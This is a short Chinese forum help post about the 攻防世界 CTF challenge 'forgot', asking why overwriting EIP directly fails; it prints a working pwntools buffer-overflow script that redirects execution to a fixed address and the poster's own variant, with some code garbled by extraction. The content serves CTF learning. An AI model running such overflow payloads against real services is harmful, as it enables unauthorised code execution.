-
-
[求助]攻防世界 forgot 这道题为啥不能直接覆盖eip实现溢出?
-
发表于: 2021-10-20 14:29 4761
-
攻防世界 forgot 这道题为啥不能直接覆盖eip实现溢出?
网上可以成功的代码:
from pwn import
p=remote('111.200.241.244',57824)
p.recvuntil("> ")
p.sendline(b'A')
payload=b'A'32+p32(0x080486cc)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
我想用的代码:
from pwn import *
p=remote('111.200.241.244',57824)
p.recvuntil("> ")
p.sendline(b'A')
1 | payload = b 'A' * ( 74 + 4 ) + p32( 0x080486cc ) |
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
赞赏
他的文章
看原图
赞赏
雪币:
留言: